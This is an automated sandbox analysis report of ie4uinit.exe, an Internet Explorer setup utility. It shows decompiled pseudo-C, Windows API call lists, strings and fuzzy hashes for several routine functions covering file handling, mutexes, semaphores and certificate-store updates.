Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C4D8C Relevance: 19.6, APIs: 13, Instructions: 126
fileCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF77FF7319C4D8C(long long __rbx, long long __rdi, void* __r9, long long __r14) {
				void* __rbp;
				long _t36;
				long _t39;
				long _t42;
				long _t45;
				long _t49;
				long _t52;
				void* _t61;
				void* _t66;
				void* _t70;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t104;
				signed long long _t105;
				signed long long _t106;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t128;
				signed long long _t129;
				void* _t132;

				_t132 = __r9;
				_t108 = __rbx;
				_t104 = _t128;
				 *((long long*)(_t104 + 8)) = __rbx;
				 *((long long*)(_t104 + 0x10)) = __rdi;
				 *((long long*)(_t104 + 0x18)) = __r14;
				_t4 = _t104 - 0x378; // -910
				_t126 = _t4;
				_t129 = _t128 - 0x470;
				_t105 =  *0x319f4658; // 0x8be7dd1f02a
				_t106 = _t105 ^ _t129;
				 *(_t126 + 0x360) = _t106;
				_t6 = _t129 + 0x50; // 0x32
				if (E00007FF77FF7319DAA4C(_t77, _t79, _t6, _t124, __r9) < 0) goto 0x319c4f51;
				 *(_t129 + 0x30) =  *(_t129 + 0x30) & 0x00000000;
				 *(_t129 + 0x28) =  *(_t129 + 0x28) & 0x00000000;
				r9d = 0;
				 *(_t129 + 0x20) = 3;
				_t13 = _t132 + 1; // 0x1
				r14d = _t13;
				r8d = r14d;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t106 != 0xffffffff) goto 0x319c4e42;
				_t36 = GetLastError();
				_t37 =  ==  ? r14d : _t36;
				_t83 =  ==  ? r14d : _t36;
				if (( ==  ? r14d : _t36) > 0) goto 0x319c4e25;
				_t61 =  ==  ? r14d : GetLastError();
				goto 0x319c4e3a;
				_t39 = GetLastError();
				_t40 =  ==  ? r14d : _t39;
				_t62 = ( ==  ? r14d : _t39) & 0x0000ffff;
				_t63 = ( ==  ? r14d : _t39) & 0x0000ffff | 0x80070000;
				_t86 = ( ==  ? r14d : _t39) & 0x0000ffff | 0x80070000;
				if ((( ==  ? r14d : _t39) & 0x0000ffff | 0x80070000) < 0) goto 0x319c4f51;
				 *(_t129 + 0x20) =  *(_t129 + 0x20) & 0x00000000;
				r8d = 4;
				if (ReadFile(??, ??, ??, ??, ??) == 0) goto 0x319c4e69;
				goto 0x319c4e9e;
				_t42 = GetLastError();
				_t43 =  ==  ? r14d : _t42;
				_t89 =  ==  ? r14d : _t42;
				if (( ==  ? r14d : _t42) > 0) goto 0x319c4e89;
				_t66 =  ==  ? r14d : GetLastError();
				goto 0x319c4e9e;
				_t45 = GetLastError();
				_t46 =  ==  ? r14d : _t45;
				_t67 = ( ==  ? r14d : _t45) & 0x0000ffff;
				_t68 = ( ==  ? r14d : _t45) & 0x0000ffff | 0x80070000;
				CloseHandle(_t125);
				_t92 = ( ==  ? r14d : _t45) & 0x0000ffff | 0x80070000;
				if ((( ==  ? r14d : _t45) & 0x0000ffff | 0x80070000) < 0) goto 0x319c4f51;
				if ( *((intOrPtr*)(_t129 + 0x40)) != 4) goto 0x319c4ec4;
				if ( *((intOrPtr*)(_t129 + 0x44)) == 0x4020000) goto 0x319c4f51;
				if (DeleteFileW(??) != 0) goto 0x319c4f0c;
				_t49 = GetLastError();
				_t50 =  ==  ? r14d : _t49;
				_t97 =  ==  ? r14d : _t49;
				if (( ==  ? r14d : _t49) > 0) goto 0x319c4ef3;
				_t70 =  ==  ? r14d : GetLastError();
				goto 0x319c4f08;
				_t52 = GetLastError();
				_t53 =  ==  ? r14d : _t52;
				_t71 = ( ==  ? r14d : _t52) & 0x0000ffff;
				_t72 = ( ==  ? r14d : _t52) & 0x0000ffff | 0x80070000;
				_t100 = ( ==  ? r14d : _t52) & 0x0000ffff | 0x80070000;
				if ((( ==  ? r14d : _t52) & 0x0000ffff | 0x80070000) < 0) goto 0x319c4f51;
				_t21 = _t126 + 0x160; // -558
				if (E00007FF77FF7319DAAB8(__rbx, _t21) < 0) goto 0x319c4f51;
				 *(_t129 + 0x48) =  *(_t129 + 0x48) & 0x00000000;
				_t24 = _t129 + 0x48; // 0x2a
				_t25 = _t126 + 0x160; // -558
				 *(_t129 + 0x30) = _t24;
				_t27 = _t129 + 0x50; // 0x32
				if (E00007FF77FF7319DAF98(_t108, _t27, _t124, _t25) < 0) goto 0x319c4f51;
				return E00007FF77FF7319E38D0(E00007FF77FF7319DB3D0(_t108,  *(_t129 + 0x48), _t126, _t25, __r14), _t76,  *(_t126 + 0x360) ^ _t129);
			}

0x7ff7319c4d8c
0x7ff7319c4d8c
0x7ff7319c4d8c
0x7ff7319c4d8f
0x7ff7319c4d93
0x7ff7319c4d97
0x7ff7319c4d9c
0x7ff7319c4d9c
0x7ff7319c4da3
0x7ff7319c4daa
0x7ff7319c4db1
0x7ff7319c4db4
0x7ff7319c4dbb
0x7ff7319c4dc9
0x7ff7319c4dcf
0x7ff7319c4dda
0x7ff7319c4ddf
0x7ff7319c4de7
0x7ff7319c4def
0x7ff7319c4def
0x7ff7319c4df3
0x7ff7319c4df6
0x7ff7319c4e03
0x7ff7319c4e05
0x7ff7319c4e0d
0x7ff7319c4e11
0x7ff7319c4e13
0x7ff7319c4e1f
0x7ff7319c4e23
0x7ff7319c4e25
0x7ff7319c4e2d
0x7ff7319c4e31
0x7ff7319c4e34
0x7ff7319c4e3a
0x7ff7319c4e3c
0x7ff7319c4e42
0x7ff7319c4e4d
0x7ff7319c4e63
0x7ff7319c4e67
0x7ff7319c4e69
0x7ff7319c4e71
0x7ff7319c4e75
0x7ff7319c4e77
0x7ff7319c4e83
0x7ff7319c4e87
0x7ff7319c4e89
0x7ff7319c4e91
0x7ff7319c4e95
0x7ff7319c4e98
0x7ff7319c4ea1
0x7ff7319c4ea7
0x7ff7319c4ea9
0x7ff7319c4eb4
0x7ff7319c4ebe
0x7ff7319c4ed1
0x7ff7319c4ed3
0x7ff7319c4edb
0x7ff7319c4edf
0x7ff7319c4ee1
0x7ff7319c4eed
0x7ff7319c4ef1
0x7ff7319c4ef3
0x7ff7319c4efb
0x7ff7319c4eff
0x7ff7319c4f02
0x7ff7319c4f08
0x7ff7319c4f0a
0x7ff7319c4f0c
0x7ff7319c4f1c
0x7ff7319c4f1e
0x7ff7319c4f24
0x7ff7319c4f29
0x7ff7319c4f30
0x7ff7319c4f35
0x7ff7319c4f43
0x7ff7319c4f7a

APIs

CreateFileW.KERNEL32 ref: 00007FF7319C4DF6
GetLastError.KERNEL32 ref: 00007FF7319C4E05
GetLastError.KERNEL32 ref: 00007FF7319C4E15
GetLastError.KERNEL32 ref: 00007FF7319C4E25
ReadFile.KERNEL32 ref: 00007FF7319C4E5B
GetLastError.KERNEL32 ref: 00007FF7319C4E69
GetLastError.KERNEL32 ref: 00007FF7319C4E79
GetLastError.KERNEL32 ref: 00007FF7319C4E89
CloseHandle.KERNEL32 ref: 00007FF7319C4EA1
DeleteFileW.KERNEL32 ref: 00007FF7319C4EC9
GetLastError.KERNEL32 ref: 00007FF7319C4ED3
GetLastError.KERNEL32 ref: 00007FF7319C4EE3
GetLastError.KERNEL32 ref: 00007FF7319C4EF3

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$File$CloseCreateDeleteHandleRead
String ID:
API String ID: 2438661856-0
Opcode ID: 4185563944fc082adddc344a4aa7eaae3579df12ee75d4a504b46ee816f78f28
Instruction ID: e3e54826331cf921d60f216f677622b7261d7fb2748bcafed6cd5cef08b2c85a
Opcode Fuzzy Hash: 4185563944fc082adddc344a4aa7eaae3579df12ee75d4a504b46ee816f78f28
Instruction Fuzzy Hash: 0A516121F0CB86E5F750AF65D5883AAA394BF44B58F804134DA9E83598DFBCE444EB30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DB5FC Relevance: 19.6, APIs: 13, Instructions: 87synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32 ref: 00007FF7319DB620
#50.IERTUTIL ref: 00007FF7319DB635
GetCurrentProcess.KERNEL32 ref: 00007FF7319DB641
GetCurrentProcess.KERNEL32 ref: 00007FF7319DB64A
DuplicateHandle.KERNEL32 ref: 00007FF7319DB66E
GetLastError.KERNEL32 ref: 00007FF7319DB67C
GetLastError.KERNEL32 ref: 00007FF7319DB690
CloseHandle.KERNEL32 ref: 00007FF7319DB6BA
OpenMutexW.KERNEL32 ref: 00007FF7319DB6CC
GetLastError.KERNEL32 ref: 00007FF7319DB6DA
GetLastError.KERNEL32 ref: 00007FF7319DB6EE
GetLastError.KERNEL32 ref: 00007FF7319DB6FB

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$CurrentHandleMutexProcess$CloseCreateDuplicateOpen
String ID:
API String ID: 3779884535-0
Opcode ID: 44bc51121d29756bba228feff36d28815b0719f3a6f79427657ec2f07360e4b6
Instruction ID: deee1240bab7e96f66f4eadbd6324d854b5a207490853b36572fea23d612e474
Opcode Fuzzy Hash: 44bc51121d29756bba228feff36d28815b0719f3a6f79427657ec2f07360e4b6
Instruction Fuzzy Hash: 10317B62F0CB8296F740AB669848376A3D1AF48BA5FC84038D94EC2758DFFDE4446730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C9DB0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 163
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00007FF77FF7319C9DB0(void* __eflags, long long __rbx, void* __rcx, signed long long* __rdx, long long __rsi, void* __r10) {
				void* _t33;
				void* _t40;
				signed long long _t81;
				signed long long _t82;
				void* _t111;
				void* _t116;
				void* _t119;
				signed long long _t120;
				WCHAR* _t134;
				int _t137;
				long _t141;

				_t114 = __rsi;
				_t85 = __rbx;
				 *((long long*)(_t119 + 8)) = __rbx;
				 *((long long*)(_t119 + 0x18)) = __rsi;
				_t120 = _t119 - 0x250;
				_t81 =  *0x319f4658; // 0x8be7dd1f02a
				_t82 = _t81 ^ _t120;
				 *(_t119 - 0x150 + 0x140) = _t82;
				 *__rdx =  *__rdx & 0x00000000;
				r14d = 0;
				E00007FF77FF7319C1310(__rbx, _t120 + 0x30, __rdx, __rcx, __r10);
				E00007FF77FF7319C31CC(_t85, _t120 + 0x30, __rdx, L"_p0");
				OpenSemaphoreW(_t141, _t137, _t134);
				if (_t82 != 0) goto 0x319c9e5c;
				if (GetLastError() == 2) goto 0x319c9fa2;
				E00007FF77FF7319C7CFC();
				goto 0x319c9f83;
				 *(_t120 + 0x24) =  *(_t120 + 0x24) & r14d;
				 *(_t120 + 0x20) =  *(_t120 + 0x20) & r14d;
				_t33 = E00007FF77FF7319C7D68(_t82, _t120 + 0x24, __rsi);
				if (_t33 >= 0) goto 0x319c9ea6;
				r9d = _t33;
				E00007FF77FF7319C7CCC();
				if (CloseHandle(_t111) == 0) goto 0x319c9fd2;
				goto 0x319c9f83;
				E00007FF77FF7319C31CC(_t82, _t120 + 0x30, _t111, "h");
				OpenSemaphoreW(??, ??, ??);
				if (_t82 != 0) goto 0x319c9f00;
				E00007FF77FF7319C7CFC();
				if (CloseHandle(_t116) == 0) goto 0x319c9fe4;
				goto 0x319c9f83;
				_t40 = E00007FF77FF7319C7D68(_t82, _t120 + 0x20, _t114);
				if (_t40 >= 0) goto 0x319c9f4e;
				r9d = _t40;
				E00007FF77FF7319C7CCC();
				if (CloseHandle(??) == 0) goto 0x319c9ff6;
				if (CloseHandle(??) == 0) goto 0x319ca008;
				goto 0x319c9f83;
				if (CloseHandle(??) == 0) goto 0x319ca01a;
				if (CloseHandle(??) == 0) goto 0x319ca02c;
				if (0 >= 0) goto 0x319c9fa2;
				r9d = 0;
				E00007FF77FF7319C7CCC();
				goto 0x319c9fa7;
				 *__rdx =  *(_t120 + 0x24) |  *(_t120 + 0x20) << 0x0000001f;
				return E00007FF77FF7319E38D0(0, 0x1f0003,  *(_t119 - 0x150 + 0x140) ^ _t120);
			}

0x7ff7319c9db0
0x7ff7319c9db0
0x7ff7319c9db0
0x7ff7319c9db5
0x7ff7319c9dca
0x7ff7319c9dd1
0x7ff7319c9dd8
0x7ff7319c9ddb
0x7ff7319c9de2
0x7ff7319c9df8
0x7ff7319c9dfb
0x7ff7319c9e0e
0x7ff7319c9e1f
0x7ff7319c9e32
0x7ff7319c9e3d
0x7ff7319c9e50
0x7ff7319c9e57
0x7ff7319c9e5c
0x7ff7319c9e66
0x7ff7319c9e6e
0x7ff7319c9e77
0x7ff7319c9e80
0x7ff7319c9e8b
0x7ff7319c9e9b
0x7ff7319c9ea1
0x7ff7319c9eb5
0x7ff7319c9ec6
0x7ff7319c9ed2
0x7ff7319c9ee3
0x7ff7319c9ef5
0x7ff7319c9efb
0x7ff7319c9f08
0x7ff7319c9f11
0x7ff7319c9f1a
0x7ff7319c9f25
0x7ff7319c9f35
0x7ff7319c9f46
0x7ff7319c9f4c
0x7ff7319c9f59
0x7ff7319c9f7b
0x7ff7319c9f85
0x7ff7319c9f8e
0x7ff7319c9f99
0x7ff7319c9fa0
0x7ff7319c9fa2
0x7ff7319c9fd1

APIs

OpenSemaphoreW.KERNEL32 ref: 00007FF7319C9E1F
GetLastError.KERNEL32 ref: 00007FF7319C9E34
CloseHandle.KERNEL32 ref: 00007FF7319C9E93

Strings

wil, xrefs: 00007FF7319C9E25
_p0, xrefs: 00007FF7319C9E00

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CloseErrorHandleLastOpenSemaphore
String ID: _p0$wil
API String ID: 3419097560-1814513734
Opcode ID: 3e00c7960a8c08b84d6e5a24b0eea78a9ec980e5ccf45dd190318e98b559e43d
Instruction ID: 92a5483f6fdca4cef32f7b856d3aabf7475eb3162dbfa4a4fcbd6fa1e1a9e89a
Opcode Fuzzy Hash: 3e00c7960a8c08b84d6e5a24b0eea78a9ec980e5ccf45dd190318e98b559e43d
Instruction Fuzzy Hash: 9A617121E0C6C3A6E724EB22D8542F99360AF88B98F944431DECD47B5DDEBCD541EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C2C20 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 76comlibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319C5974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C59AD
Part of subcall function 00007FF7319C5974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C5A1F
Part of subcall function 00007FF7319C5974: PostThreadMessageW.USER32 ref: 00007FF7319C5A39

Part of subcall function 00007FF7319C6638: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF7319CB2D5), ref: 00007FF7319C6650

GetCurrentProcess.KERNEL32 ref: 00007FF7319C2C4F
SetPriorityClass.KERNEL32 ref: 00007FF7319C2C5D
GetCurrentProcess.KERNEL32 ref: 00007FF7319C2C98
CoCreateInstance.OLE32 ref: 00007FF7319C2CD8
GetCurrentProcess.KERNEL32 ref: 00007FF7319C2D13
SetPriorityClass.KERNEL32 ref: 00007FF7319C2D21
GetModuleHandleW.KERNEL32 ref: 00007FF7319C2D54
GetProcAddress.KERNEL32 ref: 00007FF7319C2D64

Strings

In CmdInitializeHistoryRoaming, xrefs: 00007FF7319C2C2A
kernel32.dll, xrefs: 00007FF7319C2D4D
SetProcessInformation, xrefs: 00007FF7319C2D5D

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CurrentProcess$ClassMessageOncePriority$AddressCreateExecuteFormatHandleInitInstanceLocalModulePostProcThreadTime
String ID: In CmdInitializeHistoryRoaming$SetProcessInformation$kernel32.dll
API String ID: 2110875543-2055926704
Opcode ID: 5d8f48ecbbc805998aae92a6a82375090ee2319cc10a4b9bb8d007ac82841689
Instruction ID: c49c8698f78d87b875ad41f38e698381106d34c2285f10d236b46cd6ca91df82
Opcode Fuzzy Hash: 5d8f48ecbbc805998aae92a6a82375090ee2319cc10a4b9bb8d007ac82841689
Instruction Fuzzy Hash: B9311F65E0CA82B2EB00EB15E844264B3A0EB88B59FD08135C98D473B9DEBCE545E731

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D797C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 93
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00007FF77FF7319D797C(void* __edx, void* __esi, long long __rbx, void* __rcx, void* __rdx, void* _a8, signed int _a16, intOrPtr _a24) {
				long long _v40;
				void* __rsi;
				void* __rbp;
				void* _t19;
				void* _t22;
				void* _t37;
				void* _t40;
				void* _t43;
				void* _t49;
				void* _t61;
				long long _t62;
				long long _t63;
				void* _t77;
				void* _t80;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t91;

				_t65 = __rcx;
				_t63 = __rbx;
				_t49 = __esi;
				_t61 = _t86;
				 *((long long*)(_t61 + 8)) = __rbx;
				_t84 = __rcx;
				if (__rdx == 0) goto 0x319d7aab;
				 *(_t61 + 0x18) =  *(_t61 + 0x18) & 0x00000000;
				_t91 = _t61 + 0x10;
				 *(_t61 + 0x10) =  *(_t61 + 0x10) & 0x00000000;
				if (E00007FF77FF7319D763C(_t19, __rbx, __rcx, __rdx, __rcx, _t61 + 0x18, _t91) < 0) goto 0x319d7aab;
				r8d = 0;
				_t62 = L"Trust";
				r9d = 0x10000;
				_v40 = _t62;
				__imp__CertOpenStore(_t77, _t80, _t83);
				if (_t62 == 0) goto 0x319d7a89;
				r8d = _a16;
				__imp__CertCreateCertificateContext();
				if (_t62 == 0) goto 0x319d7a68;
				if (E00007FF77FF7319D780C(_t20, _t49, _t63, _t65, _t62) < 0) goto 0x319d7a5d;
				_a16 = _a16 & 0x00000000;
				_t22 = E00007FF77FF7319D7C38(_t63, _t84, _t62, _t62,  &_a16);
				if (_t22 < 0) goto 0x319d7a5d;
				r9d = 0;
				_t16 = _t91 + 3; // 0x3
				r8d = _t16;
				__imp__CertAddCertificateContextToStore();
				if (_t22 == 0) goto 0x319d7a49;
				goto 0x319d7a5d;
				_t37 =  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
				__imp__CertFreeCertificateContext();
				goto 0x319d7a7c;
				_t40 =  <=  ? GetLastError() : _t24 & 0x0000ffff | 0x80070000;
				__imp__CertCloseStore();
				goto 0x319d7a9d;
				_t43 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
				E00007FF77FF7319C1698(_t62, _a24);
				if (_t43 >= 0) goto 0x319d7ab7;
				E00007FF77FF7319D210C(_t63, 0x319ec710);
				return _t43;
			}

0x7ff7319d797c
0x7ff7319d797c
0x7ff7319d797c
0x7ff7319d797c
0x7ff7319d797f
0x7ff7319d798a
0x7ff7319d7995
0x7ff7319d799b
0x7ff7319d79a0
0x7ff7319d79a4
0x7ff7319d79b5
0x7ff7319d79bb
0x7ff7319d79be
0x7ff7319d79c5
0x7ff7319d79cb
0x7ff7319d79d9
0x7ff7319d79e5
0x7ff7319d79eb
0x7ff7319d79f7
0x7ff7319d7a03
0x7ff7319d7a11
0x7ff7319d7a13
0x7ff7319d7a23
0x7ff7319d7a2c
0x7ff7319d7a2e
0x7ff7319d7a37
0x7ff7319d7a37
0x7ff7319d7a3b
0x7ff7319d7a43
0x7ff7319d7a47
0x7ff7319d7a5a
0x7ff7319d7a60
0x7ff7319d7a66
0x7ff7319d7a79
0x7ff7319d7a81
0x7ff7319d7a87
0x7ff7319d7a9a
0x7ff7319d7aa2
0x7ff7319d7aa9
0x7ff7319d7ab2
0x7ff7319d7ac5

APIs

Part of subcall function 00007FF7319D763C: CryptStringToBinaryW.CRYPT32 ref: 00007FF7319D7683
Part of subcall function 00007FF7319D763C: CryptStringToBinaryW.CRYPT32 ref: 00007FF7319D76C1

CertOpenStore.CRYPT32 ref: 00007FF7319D79D9
CertCreateCertificateContext.CRYPT32 ref: 00007FF7319D79F7
CertFreeCertificateContext.CRYPT32 ref: 00007FF7319D7A60

Part of subcall function 00007FF7319D7C38: memset.MSVCRT ref: 00007FF7319D7C73
Part of subcall function 00007FF7319D7C38: CertGetCertificateChain.CRYPT32 ref: 00007FF7319D7CAA
Part of subcall function 00007FF7319D7C38: CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF7319D7D0B
Part of subcall function 00007FF7319D7C38: CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF7319D7D38
Part of subcall function 00007FF7319D7C38: CertFreeCertificateChain.CRYPT32 ref: 00007FF7319D7D8C

CertAddCertificateContextToStore.CRYPT32 ref: 00007FF7319D7A3B
GetLastError.KERNEL32 ref: 00007FF7319D7A49
GetLastError.KERNEL32 ref: 00007FF7319D7A68
CertCloseStore.CRYPT32 ref: 00007FF7319D7A81

Part of subcall function 00007FF7319D780C: CertGetIntendedKeyUsage.CRYPT32 ref: 00007FF7319D7842
Part of subcall function 00007FF7319D780C: CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF7319D7871
Part of subcall function 00007FF7319D780C: CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF7319D7899
Part of subcall function 00007FF7319D780C: StrCmpNA.SHLWAPI ref: 00007FF7319D78D1
Part of subcall function 00007FF7319D780C: StrCmpNW.SHLWAPI(?,?,00000000,00000000,?,00007FF7319D7A0D), ref: 00007FF7319D793D

GetLastError.KERNEL32 ref: 00007FF7319D7A89

Strings

status, xrefs: 00007FF7319D7983
Trust, xrefs: 00007FF7319D79BE

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Cert$Certificate$Chain$ContextErrorLastStoreUsage$BinaryCryptEnhancedFreePolicyStringVerify$CloseCreateIntendedOpenmemset
String ID: Trust$status
API String ID: 125674551-3800218552
Opcode ID: 559f0b4a6e79f63e8633198e127aaba42bb0adbcb39e31d22a3241c6a7a8e3fb
Instruction ID: a619deca9db21b33e7d5f85e48d57678245e74894dca05e2a1596ac8fc6cb6b1
Opcode Fuzzy Hash: 559f0b4a6e79f63e8633198e127aaba42bb0adbcb39e31d22a3241c6a7a8e3fb
Instruction Fuzzy Hash: 73316822F08782A6F704BBA5DD443B9E394AF44B9CFC04035DA4D46698EFACE504D731

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E1084 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNEL32(?,?,?,?,?,?,?,00007FF7319E07F2,?,?,?,?,00000000,00007FF7319CD62B), ref: 00007FF7319E10AC
#791.IERTUTIL(?,?,?,?,?,?,?,00007FF7319E07F2,?,?,?,?,00000000,00007FF7319CD62B), ref: 00007FF7319E10C3
#791.IERTUTIL(?,?,?,?,?,?,?,00007FF7319E07F2,?,?,?,?,00000000,00007FF7319CD62B), ref: 00007FF7319E10D2
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00007FF7319E07F2,?,?,?,?,00000000,00007FF7319CD62B), ref: 00007FF7319E10E9
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00007FF7319E07F2,?,?,?,?,00000000,00007FF7319CD62B), ref: 00007FF7319E10F2
DuplicateHandle.KERNEL32 ref: 00007FF7319E111A
GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7319E07F2,?,?,?,?,00000000,00007FF7319CD62B), ref: 00007FF7319E112D
GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7319E07F2,?,?,?,?,00000000,00007FF7319CD62B), ref: 00007FF7319E1165
OpenFileMappingW.KERNEL32(?,?,?,?,?,?,?,00007FF7319E07F2,?,?,?,?,00000000,00007FF7319CD62B), ref: 00007FF7319E117C

Strings

Local\windows_ie_global_counters, xrefs: 00007FF7319E109F, 00007FF7319E1170

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #791CurrentErrorFileLastMappingOpenProcess$DuplicateHandle
String ID: Local\windows_ie_global_counters
API String ID: 2235036709-3887093185
Opcode ID: 96ae099d120dd4b312794b8523560f6b56ee7184dda3e47ce1d7480bc7ff1a19
Instruction ID: 85523efb24c115b75c6726cffdc171a0763c97bab9b66e9eb890b46a7fb5afaa
Opcode Fuzzy Hash: 96ae099d120dd4b312794b8523560f6b56ee7184dda3e47ce1d7480bc7ff1a19
Instruction Fuzzy Hash: A5214B71E0DB8196EB44AB16E804269F7E1FF88B88F848039D94E43768DFBCE4459730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DA810 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60COMMON

Download Yara Rule

APIs

StrCmpICW.SHLWAPI ref: 00007FF7319DA82E
StrCmpICW.SHLWAPI ref: 00007FF7319DA84D

Strings

msn.cn, xrefs: 00007FF7319DA8BD
about:newsfeed, xrefs: 00007FF7319DA843
about:tabs, xrefs: 00007FF7319DA824
msn.com, xrefs: 00007FF7319DA8A8

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
